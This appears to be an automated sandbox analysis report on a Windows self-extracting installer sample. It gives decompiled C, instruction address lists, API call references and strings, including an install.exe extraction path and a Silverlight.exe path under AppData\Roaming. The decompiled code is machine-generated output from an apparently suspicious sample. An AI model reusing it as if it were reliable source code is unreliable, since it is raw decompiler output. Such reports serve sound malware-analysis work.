						_t373 = E01005C72(_t372,  *((intOrPtr*)(_t488 + 0x528)));
						__eflags = _t488 + 0x52c;
						return _t373;
					} else {
						 *0x100ad60 = _t372;
						goto L3;
					}
				}
				L201:
			}

0x01004b0f
0x01004b0f
0x01004b0f
0x01004b10
0x01004b17
0x01004b1d
0x01004b25
0x01004b2b
0x01004b37
0x01004b3e
0x01004b42
0x01004b46
0x01004b49
0x01004b4c
0x01004b4f
0x01004b52
0x01004b55
0x01004b58
0x01004b5f
0x01004b62
0x01004b65
0x01004b68
0x01004b83
0x01004b8f
0x01004b96
0x01004b9f
0x01004ba0
0x01004baa
0x01004bb0
0x01004bb2
0x01004bc2
0x01004bc8
0x01004bca
0x01004bcf
0x01004bd5
0x01004be4
0x01004be6
0x01004be8
0x01004bf7
0x01004bf9
0x01004bfb
0x01004c0a
0x01004c0c
0x01004c0e
0x01004c21
0x01004c27
0x01004c29
0x01004c2e
0x01004c2e
0x01004c29
0x01004c0e
0x01004bfb
0x01004be8
0x01004bca
0x01004c31
0x01004c37
0x01004c56
0x01004c60
0x01004c6c
0x01004c70
0x01004c74
0x01004c74
0x01004c77
0x01004c7c
0x01004c7e
0x01004c81
0x01004c84
0x01004c84
0x01004c87
0x01004c9a
0x01004c9e
0x01004ca4
0x01004ca6
0x01004caa
0x01004d7a
0x01004d7a
0x01004cb0
0x01004cb4
0x01004cc3
0x01004ccb
0x01004ccd
0x01004cd1
0x01004ce8
0x01004ceb
0x01004cf0
0x01004cf2
0x01004cf4
0x00000000
0x01004cfa
0x01004cfd
0x01004cfe
0x01004d03
0x01004d05
0x00000000
0x01004d07
0x01004d1b
0x01004d21
0x01004d23
0x00000000
0x01004d25
0x01004d28
0x01004d2c
0x01004d2c
0x01004d2f
0x01004d32
0x01004d34
0x01004d3b
0x01004d3d
0x01004d47
0x01004d4a
0x01004d63
0x01004d63
0x01004d66
0x01004d68
0x01004d6f
0x01004d6f
0x01004d72
0x01004d75
0x01004d6a
0x01004d6a
0x01004d6d
0x00000000
0x00000000
0x01004d6d
0x01004d68
0x01004d4c
0x01004d4c
0x01004d4f
0x00000000
0x01004d51
0x01004d51
0x01004d58
0x01004d58
0x01004d5b
0x01004d5e
0x01004d53
0x01004d53
0x01004d56
0x00000000
0x00000000
0x00000000
0x00000000
0x01004d56
0x01004d51
0x01004d4f
0x01004d3f
0x01004d3f
0x01004d42
0x01004d42
0x01004d3d
0x01004d23
0x01004d05
0x01004cd3
0x01004cdc
0x01004cde
0x01004ce2
0x00000000
0x00000000
0x00000000
0x00000000
0x01004ce2
0x01004cd1
0x01004caa
0x01004d7d
0x01004d7f
0x01004d82
0x01004d82
0x01004d8b
0x01004d8d
0x01004d90
0x01004d9c
0x01004da1
0x01004da6
0x01004db6
0x01004db6
0x01004db9
0x01004dbc
0x00000000
0x01004dbe
0x01004dbe
0x01004dc8
0x01004dc8
0x01004dcb
0x01004dc0
0x01004dc3
0x01004dc6
0x00000000
0x00000000
0x00000000
0x00000000
0x01004dc6
0x01004dbe
0x01004da8
0x01004daa
0x01004dad
0x01004dd0
0x01004dd0
0x01004dd3
0x01004daf
0x01004daf
0x00000000
0x01004db1
0x01004db1
0x01004db4
0x00000000
0x00000000
0x00000000
0x00000000
0x01004db4
0x01004daf
0x01004dad
0x01004dd6
0x01004ddd
0x01004dde
0x01004dde
0x01004de0
0x01004de3
0x01004df0
0x01004df0
0x01004df3
0x0100500e
0x0100500e
0x00000000
0x01004df9
0x01004df9
0x01004e04
0x01004e07
0x00000000
0x01004dfb
0x01004dfb
0x01004dfe
0x00000000
0x00000000
0x00000000
0x00000000
0x01004dfe
0x01004df9
0x01004de5
0x01004de5
0x01004deb
0x01004deb
0x01004e0a
0x01004e17
0x01004e1d
0x01004e1f
0x01004eed
0x01004eed
0x01004efc
0x01004f07
0x01004f15
0x01004f2c
0x01004f33
0x01004f39
0x01004f3e
0x01004f40
0x01004f49
0x00000000
0x00000000
0x00000000
0x00000000
0x01004e25
0x01004e25
0x01004e2b
0x01004e2e
0x01004e31
0x01004e36
0x01004e42
0x01004e48
0x01004e4a
0x01004e56
0x01004e60
0x01004e65
0x01004e69
0x01004e69
0x01004e6c
0x01004e6f
0x01004e71
0x01004e77
0x01004e7a
0x01004e8b
0x01004e8d
0x01004e91
0x01004e94
0x01004e95
0x01004e95
0x01004e7a
0x01004e6f
0x01004e9a
0x01004ea1
0x01004eb9
0x01004ea3
0x01004ea5
0x01004eab
0x01004eb0
0x01004eb2
0x01004eb4
0x01004eb4
0x01004eb2
0x01004ec0
0x01004ec3
0x01004ec7
0x01004ec9
0x01004ecd
0x00000000
0x00000000
0x01004ecd
0x00000000
0x01004ecf
0x01004ecf
0x01004ecf
0x01004ee1
0x01004ee7
0x01004eeb
0x00000000
0x00000000
0x00000000
0x00000000
0x01004eeb
0x01004de7
0x01004de7
0x01004de9
0x00000000
0x00000000
0x00000000
0x00000000
0x01004de9
0x01004de5
0x01004d92
0x01004d92
0x00000000
0x01004d92
0x01004c39
0x01004c39
0x01004c3f
0x00000000
0x01004c41
0x01004c4b
0x01004f4c
0x01004f4c
0x01004f4e
0x01004f54
0x01004ff1
0x01004ff1
0x01004ff4
0x00000000
0x01004ff6
0x01005000
0x01005005
0x01005007
0x00000000
0x01005009
0x00000000
0x01005009
0x01005007
0x01004f5a
0x01004f5a
0x01004f60
0x00000000
0x01004f66
0x01004f66
0x01004f6b
0x01004f7f
0x01004f85
0x01004f88
0x00000000
0x00000000
0x01004f8e
0x01004f90
0x01004fea
0x01004fea
0x00000000
0x01004f92
0x01004f92
0x01004f95
0x00000000
0x01004f97
0x01004f97
0x01004f99
0x01004f99
0x01004f9c
0x01004f9c
0x01004f9e
0x01004f9f
0x01004f9f
0x01004fa5
0x01004fa6
0x01004fac
0x01004f42
0x01004f42
0x00000000
0x01004fae
0x01004fb0
0x01004fb0
0x01004fb2
0x01004fb2
0x01004fb4
0x01004fb7
0x01004fb8
0x01004fb8
0x01004fbf
0x01004fc4
0x01004fc6
0x01004fc8
0x01004fc8
0x01004fcf
0x01004fd2
0x00000000
0x01004fd4
0x01004fd4
0x00000000
0x01004fd5
0x01004fd2
0x01004fac
0x01004f95
0x00000000
0x01004f90
0x00000000
0x01004f6b
0x01004f60
0x01004f54
0x01004c3f
0x01004b98
0x01004b98
0x01004b98
0x01005013
0x01005013
0x01005018
0x01005019
0x0100501a
0x01005021
0x01005027
0x0100502c
0x0100502d
0x01005033
0x0100503d
0x0100503e
0x0100503f
0x01005190
0x01005190
0x01005190
0x01005045
0x01005048
0x01005166
0x0100516c
0x010051a8
0x010051a8
0x00000000
0x0100516e
0x0100516e
0x01005174
0x00000000
0x01005176
0x01005176
0x01005184
0x0100518a
0x0100518d
0x0100518e
0x010051ae
0x010051ae
0x010051b4
0x01005209
0x01005209
0x0100520f
0x01005211
0x01005216
0x01005218
0x00000000
0x00000000
0x01005227
0x01005227
0x01005239
0x01005241
0x01005247
0x01005251
0x01005257
0x0100525c
0x010052ad
0x010052c1
0x010052c3
0x010052c5
0x010052c8
0x00000000
0x00000000
0x01005264
0x0100526a
0x0100526d
0x01005294
0x01005294
0x0100529a
0x00000000
0x00000000
0x010052a2
0x010052a8
0x0100526f
0x01005278
0x0100527d
0x0100527f
0x00000000
0x01005281
0x01005281
0x01005281
0x01005283
0x01005283
0x01005283
0x01005289
0x0100528d
0x0100528e
0x0100528e
0x01005292
0x0100527f
0x0100526d
0x010052db
0x010052de
0x010052e8
0x010052ea
0x010052f0
0x010051b6
0x010051b6
0x010051bc
0x00000000
0x010051be
0x010051c6
0x010051cc
0x010051cf
0x010051d0
0x00000000
0x010051d2
0x010051d4
0x010051db
0x010051e0
0x010051e2
0x010051e3
0x010051e8
0x010051ea
0x00000000
0x010051ea
0x010051f1
0x010051f6
0x01005200
0x01005202
0x01005202
0x010051d0
0x010051bc
0x00000000
0x00000000
0x00000000
0x0100518e
0x01005174
0x0100504e
0x01005051
0x00000000
0x01005057
0x01005057
0x01005064
0x01005080
0x0100508e
0x0100509d
0x010050a6
0x010050ac
0x010050b2
0x010050b8
0x010050ba
0x010050bf
0x010050c1
0x010050c3
0x010050c3
0x010052f9
0x010052f9
0x010052fe
0x010052ff
0x01005305
0x01005314
0x0100531e
0x01005322
0x01005328
0x0100532e
0x01005337
0x0100533d
0x01005349
0x0100534e
0x0100535d
0x0100535f
0x01005361
0x01005366
0x0100536f
0x01005374
0x0100537a
0x010053ac
0x010053b2
0x010053c5
0x010053cb
0x010053cd
0x010053de
0x010053e4
0x010053e9
0x010053eb
0x010053f7
0x010053fd
0x01005403
0x0100543d
0x0100543f
0x0100544c
0x0100544c
0x0100545e
0x0100546f
0x01005405
0x0100540a
0x01005417
0x01005429
0x01005429
0x01005471
0x01005477
0x010054e5
0x010054e5
0x010054ea
0x010054f5
0x010055e3
0x010055ee
0x0100560a
0x0100560c
0x0100560f
0x00000000
0x00000000
0x0100561d
0x01005624
0x01005629
0x0100562b
0x0100562c
0x01005631
0x01005634
0x01005641
0x01005647
0x01005649
0x0100564b
0x01005650
0x01005654
0x01005656
0x0100565c
0x01005666
0x01005666
0x01005654
0x01005649
0x0100566a
0x01005670
0x01005676
0x00000000
0x0100567c
0x0100567d
0x01005683
0x01005683
0x01005689
0x010056a6
0x010056a6
0x010056ac
0x010057da
0x010057da
0x010057e0
0x010057e9
0x01005800
0x01005813
0x01005813
0x01005819
0x01005819
0x0100581e
0x01005820
0x00000000
0x00000000
0x01005827
0x01005829
0x01005864
0x01005864
0x00000000
0x01005864
0x0100582b
0x01005839
0x0100583e
0x01005846
0x0100584a
0x0100584b
0x01005850
0x01005852
0x01005857
0x01005859
0x01005859
0x0100585b
0x0100585b
0x01005860
0x01005862
0x00000000
0x00000000
0x00000000
0x00000000
0x01005862
0x010056b2
0x010056b8
0x00000000
0x00000000
0x010056be
0x010056c4
0x010056d7
0x010056d7
0x010056e9
0x010056f5
0x010056f7
0x010056fc
0x01005703
0x01005703
0x01005705
0x01005705
0x01005707
0x0100570a
0x0100570b
0x0100570b
0x0100570f
0x01005714
0x01005716
0x01005716
0x01005718
0x01005719
0x01005719
0x0100571f
0x01005721
0x01005721
0x01005722
0x01005722
0x01005725
0x01005726
0x01005726
0x0100572c
0x0100572f
0x01005738
0x01005738
0x0100573a
0x0100573d
0x01005741
0x01005741
0x01005741
0x01005743
0x01005744
0x01005748
0x01005760
0x01005770
0x01005776
0x01005778
0x00000000
0x00000000
0x0100577e
0x01005784
0x0100578d
0x0100578d
0x01005793
0x0100579a
0x0100579f
0x010057ae
0x010057b8
0x010057be
0x010057c3
0x010057cb
0x010057d3
0x010057cd
0x010057cd
0x010057cd
0x00000000
0x010057cb
0x0100568b
0x01005691
0x00000000
0x00000000
0x01005693
0x01005699
0x0100569e
0x010056a0
0x00000000
0x00000000
0x00000000
0x010056a0
0x01005676
0x010054fb
0x01005501
0x01005519
0x01005520
0x01005531
0x01005543
0x01005551
0x01005563
0x01005574
0x0100557b
0x0100557b
0x0100558d
0x01005597
0x01005597
0x010055b3
0x010055b8
0x010055bb
0x010055bd
0x00000000
0x010055c3
0x010055c3
0x010055c9
0x010055d7
0x010055d7
0x010055dd
0x00000000
0x00000000
0x00000000
0x010055dd
0x010055cb
0x010055d1
0x00000000
0x00000000
0x00000000
0x010055d1
0x01005479
0x01005479
0x0100547a
0x01005485
0x010054b0
0x010054b5
0x010054bc
0x010054c0
0x010054c5
0x010054c8
0x010054ca
0x0100538d
0x0100538d
0x00000000
0x0100538d
0x010054d0
0x010054d6
0x010054df
0x010054df
0x00000000
0x010054d6
0x01005477
0x010053ed
0x010053ed
0x00000000
0x010053ed
0x010053cf
0x00000000
0x010053cf
0x0100537c
0x01005386
0x0100538b
0x01005397
0x0100539d
0x0100539f
0x0100539f
0x010053a5
0x010053a5
0x00000000
0x010053a5
0x00000000
0x01005368
0x01005368
0x01005368
0x01005869
0x01005869
0x0100586e
0x0100586e
0x01005874
0x0100587b
0x01005881
0x01005881
0x0100588b
0x0100588b
0x01005366
0x010050d7
0x010050d7
0x010050dd
0x010050e3
0x010050e8
0x010050f2
0x01005102
0x01005108
0x0100510a
0x010052f7
0x010052f7
0x00000000
0x010052f7
0x0100510a
0x01005110
0x01005112
0x01005120
0x01005132
0x0100513c
0x0100513f
0x01005141
0x00000000
0x00000000
0x01005136
0x01005139
0x0100513b
0x0100513b
0x00000000
0x0100513b
0x00000000
0x01005139
0x0100514c
0x01005155
0x0100515c
0x0100515c
0x01005112
0x01005068
0x01005068
0x01005051
0x01005048
0x010051a7
0x010051a7
0x01004b6a
0x01004b71
0x01004b78
0x01004fd6
0x01004fdd
0x01004fe2
0x01004fe9
0x01004b7e
0x01004b7e
0x00000000
0x01004b7e
0x01004b78
0x00000000

APIs

Part of subcall function 0100428F: GetFileAttributesA.KERNELBASE(?), ref: 010042FD
Part of subcall function 0100428F: LoadLibraryA.KERNEL32(advapi32.dll), ref: 01004311
Part of subcall function 0100428F: GetProcAddress.KERNEL32(00000000,DecryptFileA), ref: 01004321
Part of subcall function 0100428F: DecryptFileA.ADVAPI32(?,00000000), ref: 01004334
Part of subcall function 0100428F: GetLastError.KERNEL32 ref: 0100433A

InitializeSecurityDescriptor.ADVAPI32(?,00000001,?,?,?,?,?), ref: 01004BAA
InitializeAcl.ADVAPI32(?,00000100,00000002,?,?,?,?,?), ref: 01004BC2
AddAccessAllowedAce.ADVAPI32(?,00000002,10000000,?,?,?,?,?,?), ref: 01004BE4
AddAccessAllowedAce.ADVAPI32(?,00000002,10000000,?,?,?,?,?,?), ref: 01004BF7
AddAccessAllowedAce.ADVAPI32(?,00000002,10000000,?,?,?,?,?,?), ref: 01004C0A
SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000,?,?,?,?,?), ref: 01004C21
GetCurrentDirectoryA.KERNEL32(00000104,c:\5a70dbc53fcf0baade86ff,?,?,?,?,?), ref: 01004C4B
GetSystemDirectoryA.KERNEL32 ref: 01004C60
QueryDosDeviceA.KERNEL32(?,?,00000400), ref: 01004C9E
_strlwr.MSVCRT ref: 01004CB4
strstr.MSVCRT ref: 01004CCB
strstr.MSVCRT ref: 01004CDC
GetDiskFreeSpaceA.KERNELBASE(?,?,?,?,?,?,?,?), ref: 01004D1B
CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000001,F0000000,?,?,?,?,?), ref: 01004E17
CryptGenRandom.ADVAPI32(?,00000010,?,?,?,?,?,?), ref: 01004E42
sprintf.MSVCRT ref: 01004E56
sprintf.MSVCRT ref: 01004E8B
CryptReleaseContext.ADVAPI32(?,00000000,?,?,?,?,?), ref: 01004EE1
GetSystemTime.KERNEL32(?,?,temp\ext,c:\5a70dbc53fcf0baade86ff,?,?,?,?,?), ref: 01004F07
SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?), ref: 01004F15
DialogBoxParamA.USER32 ref: 01004F7F
DosDateTimeToFileTime.KERNEL32(?,?,?), ref: 01005080
LocalFileTimeToFileTime.KERNEL32(?,?,?,00000000,?), ref: 0100508E
SetFileTime.KERNELBASE(DADAFEED,?,?,?,?,00000000,?), ref: 0100509D
FindCloseChangeNotification.KERNELBASE(DADAFEED,?,00000000,?), ref: 010050A6
SendDlgItemMessageA.USER32(00180176,0000006A,00000405,00000000,00000000), ref: 010050D7
MoveFileExA.KERNEL32 ref: 01005102
strstr.MSVCRT ref: 01005184
_stricmp.MSVCRT(?,_sfx_manifest_,?,00000000,?), ref: 010051C6
SendDlgItemMessageA.USER32(00180176,00000068,0000000C,00000000,?), ref: 01005227
GetLastError.KERNEL32(?,00000000,?), ref: 01005264
CreateFileA.KERNELBASE(?,40000000,00000003,00000000,00000002,00000080,00000000,0100A008,?,c:\5a70dbc53fcf0baade86ff,?,?,?,00000000,?), ref: 010052C1
SetFilePointer.KERNELBASE(00000000,?,00000000,00000000,?,00000000,?), ref: 010052DB
SetEndOfFile.KERNELBASE(00000000,?,00000000,?), ref: 010052DE
SetFilePointer.KERNELBASE(00000000,00000000,00000000,00000000,?,00000000,?), ref: 010052E8
InitializeCriticalSectionAndSpinCount.KERNEL32(0100AD40,000000FF,6E215CA0,00000000,?,00000000), ref: 0100532E
#17.COMCTL32 ref: 0100533D
GetProcessHeap.KERNEL32 ref: 01005343
CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 0100535D
CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 010053B0
CreateThread.KERNELBASE ref: 010053C5

Part of subcall function 0100423B: CreateDirectoryA.KERNELBASE(?,?), ref: 01004261

WaitForSingleObject.KERNEL32(000000FF), ref: 010053DE
Sleep.KERNEL32(000001F4), ref: 0100540A
ShowWindow.USER32(00000000), ref: 01005417
SetParent.USER32 ref: 01005429
ShowWindow.USER32(00000000), ref: 010054DF
LoadStringA.USER32 ref: 01005519
LoadStringA.USER32 ref: 01005531
SendDlgItemMessageA.USER32(00000065,0000000C,00000000,c:\5a70dbc53fcf0baade86ff\install.exe), ref: 01005543
SendDlgItemMessageA.USER32(00000066,0000000C,00000000,To Directory:), ref: 01005551
SendDlgItemMessageA.USER32(00000069,0000000C,00000000,c:\5a70dbc53fcf0baade86ff), ref: 01005563
SendDlgItemMessageA.USER32(0000006A,00000402,00000000,00000000), ref: 01005574
SendDlgItemMessageA.USER32(0000006A,00000401,00000000,?), ref: 0100558D
ShowWindow.USER32(00000005), ref: 01005597
DeleteCriticalSection.KERNEL32(0100AD40,20000001), ref: 0100587B
ExitProcess.KERNEL32 ref: 0100588B

Strings

cdtag.1, xrefs: 0100517C
c:\5a70dbc53fcf0baade86ff, xrefs: 01004B25, 01004B6C, 01004B7E, 01004C41, 01004E31, 01004E55, 01004E9A, 01004EAA, 01004EED, 01004EF2, 01004F38, 01004F66, 01004FBE, 01004FFB, 010050E3, 010050F1, 0100512C, 01005234, 01005553, 010055E9, 010056DF
ramdisk, xrefs: 01004CD6
c:\, xrefs: 01004B37
C:\Users\user\AppData\Roaming\Silverlight.exe, xrefs: 0100547B, 010055AA, 010056EB
harddisk, xrefs: 01004CC3
temp\ext, xrefs: 01004EF3
c:\5a70dbc53fcf0baade86ff\install.exe, xrefs: 010054F0, 0100550D, 01005537, 010055E3, 01005603, 0100567C, 0100576E, 010057F4, 0100580B, 0100580C
_sfx_manifest_, xrefs: 010051BE, 010055E4
To Directory:, xrefs: 01005520, 01005525, 01005545
_SFX_CAB_EXE_PATH, xrefs: 010056E4
D, xrefs: 01005760
_SFX_CAB_EXE_PACKAGE, xrefs: 010056F0
%02x, xrefs: 01004E83

Memory Dump Source

Source File: 00000006.00000002.404426464.0000000001002000.00000020.00020000.sdmp, Offset: 01000000, based on PE: true

Associated: 00000006.00000002.404390905.0000000001000000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.404470606.000000000100A000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.404507751.000000000101C000.00000002.00020000.sdmp Download File

Similarity

API ID: File$Time$ItemMessageSend$Create$AccessAllowedCryptDirectoryInitializeLoadShowSystemWindowstrstr$ContextCriticalDescriptorErrorEventLastPointerProcessSectionSecurityStringsprintf$AcquireAddressAttributesChangeCloseCountCurrentDaclDateDecryptDeleteDeviceDialogDiskExitFindFreeHeapLibraryLocalMoveNotificationObjectParamParentProcQueryRandomReleaseSingleSleepSpaceSpinThreadWait_stricmp_strlwr
String ID: %02x$C:\Users\user\AppData\Roaming\Silverlight.exe$D$To Directory:$_SFX_CAB_EXE_PACKAGE$_SFX_CAB_EXE_PATH$_sfx_manifest_$c:\$c:\5a70dbc53fcf0baade86ff$c:\5a70dbc53fcf0baade86ff\install.exe$cdtag.1$harddisk$ramdisk$temp\ext
API String ID: 3743241670-4126849428
Opcode ID: 76e5a35fad15568d4ad1e9a52cf17921f52a456012a4f2579d7fab6fecd5694f
Instruction ID: d65939b7357e3619fbed9216b1b7eb99df524e79c0bb0ebac5d7ef8d7c7c2a01
Opcode Fuzzy Hash: 76e5a35fad15568d4ad1e9a52cf17921f52a456012a4f2579d7fab6fecd5694f
Instruction Fuzzy Hash: 1D828D71A00309EFFB33DFA49C48AAE7BA9AB05304F04456AF6C1A71C5D77A4944CF64

Uniqueness

Uniqueness Score: -1.00%

Function 01002E03, Relevance: 24.3, APIs: 16, Instructions: 273
memoryfileCOMMON

Download Yara Rule

C-Code - Quality: 93%

			E01002E03() {
				intOrPtr _t92;
				void* _t93;
				int _t95;
				void* _t96;
				long _t97;
				void* _t100;
				intOrPtr _t103;
				signed short _t104;
				unsigned int _t105;
				void* _t110;
				long _t112;
				char* _t113;
				long _t117;
				long _t122;
				int _t125;
				int _t132;
				long _t134;
				signed char _t135;
				CHAR* _t136;
				char* _t137;
				short* _t138;
				signed char _t139;
				signed int _t142;
				CHAR* _t143;
				signed char _t150;
				void* _t154;
				char* _t156;
				short* _t157;
				short* _t158;
				short* _t159;
				short* _t160;
				short* _t161;
				CHAR* _t162;
				signed char _t163;
				void* _t164;
				void* _t166;
				void* _t185;

				_t164 = _t166 - 0x74;
				_t92 =  *0x100a028; // 0xbb40e64e
				 *((intOrPtr*)(_t164 + 0x70)) = _t92;
				_t93 = CreateFileA( *(_t164 + 0x7c), 0x80000000, 3, 0, 3, 0x10000000, 0); // executed
				 *(_t164 - 0x98) = _t93;
				if(_t93 != 0xffffffff) {
					_t95 = ReadFile(_t93, _t164 - 0x88, 0xf8, _t164 + 0x7c, 0); // executed
					if(_t95 != 0 &&  *(_t164 + 0x7c) == 0xf8) {
						if( *(_t164 - 0x88) != 0x5a4d) {
							L7:
							if( *(_t164 - 0x88) == 0x4550 &&  *((short*)(_t164 - 0x74)) >= 0xe0 &&  *(_t164 + 0x10) != 0 &&  *(_t164 + 0x14) != 0 &&  *(_t164 + 0x14) <= 0x40000) {
								_t96 = RtlAllocateHeap( *0x100ad58, 8,  *(_t164 + 0x14)); // executed
								_t154 = _t96;
								 *(_t164 - 0x9c) = _t154;
								if(_t154 != 0) {
									_t97 = SetFilePointer( *(_t164 - 0x98),  *(_t164 + 0x10), 0, 0); // executed
									if(_t97 ==  *(_t164 + 0x10) && ReadFile( *(_t164 - 0x98), _t154,  *(_t164 + 0x14), _t164 + 0x7c, 0) != 0) {
										_t132 =  *(_t164 + 0x14);
										if( *(_t164 + 0x7c) == _t132) {
											_t100 = _t154;
											 *(_t164 - 0x8c) = _t132;
											_t185 = _t132 - 0x16;
											while(1) {
												 *(_t164 - 0x90) = _t100;
												if(_t185 < 0) {
													break;
												}
												if( *_t100 != 0xc0) {
													L23:
													_t100 = _t100 + 1;
													 *(_t164 - 0x8c) =  *(_t164 - 0x8c) - 1;
													continue;
												} else {
													_push(4);
													asm("repe cmpsd");
													if(0 != 0) {
														goto L23;
													} else {
														_t134 =  *(_t100 + 0x10);
														 *(_t164 + 0x7c) = _t134;
														if(_t134 < 0x16 || _t134 >  *(_t164 - 0x8c)) {
															goto L23;
														} else {
															if(E01002DD6(0xffffffff, _t100, _t134) == 0) {
																_t135 =  *(_t164 - 0x90);
																if((_t135 & 0x00000003) != 0) {
																	_t150 =  *(_t164 - 0x9c);
																	_t163 = _t150;
																	while( *(_t164 + 0x7c) != 0) {
																		 *(_t164 + 0x7c) =  *(_t164 + 0x7c) - 1;
																		 *_t163 =  *_t135;
																		_t163 = _t163 + 1;
																		_t135 = _t135 + 1;
																	}
																	 *(_t164 + 0x7c) =  *(_t164 + 0x7c) - 1;
																	 *(_t164 - 0x90) = _t150;
																	_t135 = _t150;
																}
																_t142 =  *(_t135 + 0x14) & 0x0000ffff;
																_t103 =  *((intOrPtr*)(_t135 + 0x10)) + _t135;
																_t136 = _t135 + 0x16;
																 *(_t164 - 0x9c) = _t142;
																 *((intOrPtr*)(_t164 - 0xa4)) = _t103;
																if(_t142 != 0) {
																	while(1) {
																		_t143 = _t136;
																		_t137 =  &(_t136[4]);
																		 *(_t164 - 0x94) = _t143;
																		if(_t137 > _t103) {
																			goto L47;
																		}
																		_t104 =  *_t143;
																		if((_t104 & 0x00000001) == 0 && (_t143[2] & 0x00000001) == 0) {
																			_t105 = _t104 & 0x0000ffff;
																			_t156 = _t137;
																			_t138 =  &(_t137[_t105]);
																			 *(_t164 - 0xa0) = _t138;
																			_t139 = _t138 + (_t143[2] & 0x0000ffff);
																			 *(_t164 - 0x90) = _t139;
																			if(_t139 <=  *((intOrPtr*)(_t164 - 0xa4))) {
																				_t156[(_t105 >> 1) * 2 - 2] = 0;
																				 *((short*)( *(_t164 - 0xa0) + ((( *(_t164 - 0x94))[2] & 0x0000ffff) >> 1) * 2 - 2)) = 0;
																				_t110 = 2;
																				_t157 = _t156 - _t110;
																				 *_t157 = 0x5f;
																				_t158 = _t157 - _t110;
																				 *_t158 = 0x58;
																				_t159 = _t158 - _t110;
																				 *_t159 = 0x46;
																				_t160 = _t159 - _t110;
																				 *_t160 = 0x53;
																				_t161 = _t160 - _t110;
																				 *_t161 = 0x5f;
																				_t112 = WideCharToMultiByte(0, 0, _t161, 0xffffffff, 0, 0, 0, _t164 - 0x8c);
																				 *(_t164 + 0x7c) = _t112;
																				if(_t112 == 0 ||  *(_t164 - 0x8c) != 0) {
																					L46:
																					_t88 = _t164 - 0x9c;
																					 *_t88 =  *(_t164 - 0x9c) - 1;
																					if( *_t88 != 0) {
																						_t136 =  *(_t164 - 0x90);
																						_t103 =  *((intOrPtr*)(_t164 - 0xa4));
																						continue;
																					}
																				} else {
																					_t113 = HeapAlloc( *0x100ad58, 8, _t112);
																					 *(_t164 - 0x94) = _t113;
																					if(_t113 != 0) {
																						WideCharToMultiByte(0, 0, _t161, 0xffffffff, _t113,  *(_t164 + 0x7c), 0, 0);
																						if(GetEnvironmentVariableA( *(_t164 - 0x94), 0, 0) != 0) {
																							goto L46;
																						} else {
																							_t117 = WideCharToMultiByte(0, 0,  *(_t164 - 0xa0), 0xffffffff, 0, 0, 0, _t164 - 0x8c);
																							 *(_t164 + 0x7c) = _t117;
																							if(_t117 == 0 ||  *(_t164 - 0x8c) != 0) {
																								goto L46;
																							} else {
																								_t162 = HeapAlloc( *0x100ad58, 8, _t117);
																								if(_t162 != 0) {
																									WideCharToMultiByte(0, 0,  *(_t164 - 0xa0), 0xffffffff, _t162,  *(_t164 + 0x7c), 0, 0);
																									SetEnvironmentVariableA( *(_t164 - 0x94), _t162);
																									goto L46;
																								}
																							}
																						}
																					}
																				}
																			}
																		}
																		goto L47;
																	}
																}
															} else {
																_t100 =  *(_t164 - 0x90);
																goto L23;
															}
														}
													}
												}
												goto L47;
											}
										}
									}
								}
							}
						} else {
							_t122 = SetFilePointer( *(_t164 - 0x98),  *(_t164 - 0x4c), 0, 0); // executed
							if(_t122 ==  *(_t164 - 0x4c)) {
								_t125 = ReadFile( *(_t164 - 0x98), _t164 - 0x88, 0xf8, _t164 + 0x7c, 0); // executed
								if(_t125 != 0 &&  *(_t164 + 0x7c) == 0xf8) {
									goto L7;
								}
							}
						}
					}
					L47:
					_t93 = FindCloseChangeNotification( *(_t164 - 0x98)); // executed
				}
				return E01005C72(_t93,  *((intOrPtr*)(_t164 + 0x70)));
			}

0x01002e04
0x01002e0e
0x01002e29
0x01002e2c
0x01002e35
0x01002e3b
0x01002e5c
0x01002e60
0x01002e78
0x01002eba
0x01002ec4
0x01002f00
0x01002f06
0x01002f0a
0x01002f10
0x01002f21
0x01002f2a
0x01002f49
0x01002f4f
0x01002f55
0x01002f57
0x01002f5d
0x01002fab
0x01002fab
0x01002fb1
0x00000000
0x00000000
0x01002f65
0x01002f9d
0x01002f9d
0x01002f9e
0x00000000
0x01002f67
0x01002f67
0x01002f73
0x01002f75
0x00000000
0x01002f77
0x01002f77
0x01002f7d
0x01002f80
0x00000000
0x01002f8a
0x01002f95
0x01002fb8
0x01002fc1
0x01002fc3
0x01002fc9
0x01002fd6
0x01002fcd
0x01002fd2
0x01002fd4
0x01002fd5
0x01002fd5
0x01002fdb
0x01002fde
0x01002fe4
0x01002fe4
0x01002fe6
0x01002fed
0x01002fef
0x01002ff4
0x01002ffa
0x01003000
0x0100301a
0x0100301a
0x0100301c
0x01003021
0x01003027
0x00000000
0x00000000
0x0100302d
0x01003032
0x01003046
0x01003049
0x0100304b
0x0100304d
0x01003053
0x0100305b
0x01003061
0x0100306f
0x01003082
0x01003087
0x01003088
0x0100308a
0x0100308f
0x01003091
0x01003096
0x01003098
0x0100309d
0x0100309f
0x010030a4
0x010030b5
0x010030ba
0x010030be
0x010030c1
0x01003168
0x01003168
0x01003168
0x0100316e
0x0100300e
0x01003014
0x00000000
0x01003014
0x010030d3
0x010030dc
0x010030e4
0x010030ea
0x010030fb
0x0100310d
0x00000000
0x0100310f
0x01003123
0x01003127
0x0100312a
0x00000000
0x01003134
0x01003143
0x01003147
0x01003159
0x01003162
0x00000000
0x01003162
0x01003147
0x0100312a
0x0100310d
0x010030ea
0x010030c1
0x01003061
0x00000000
0x01003032
0x0100301a
0x01002f97
0x01002f97
0x00000000
0x01002f97
0x01002f95
0x01002f80
0x01002f75
0x00000000
0x01002f65
0x01002fb3
0x01002f4f
0x01002f2a
0x01002f10
0x01002e7a
0x01002e85
0x01002e8e
0x01002ea7
0x01002eab
0x00000000
0x00000000
0x01002eab
0x01002e8e
0x01002e78
0x01003174
0x0100317a
0x01003181
0x0100318f

APIs

CreateFileA.KERNELBASE(?,80000000,00000003,00000000,00000003,10000000,00000000), ref: 01002E2C
ReadFile.KERNELBASE(00000000,?,000000F8,?,00000000), ref: 01002E5C
SetFilePointer.KERNELBASE(?,?,00000000,00000000), ref: 01002E85
ReadFile.KERNELBASE(?,00005A4D,000000F8,?,00000000), ref: 01002EA7
RtlAllocateHeap.NTDLL(00000008,?), ref: 01002F00
SetFilePointer.KERNELBASE(?,?,00000000,00000000), ref: 01002F21
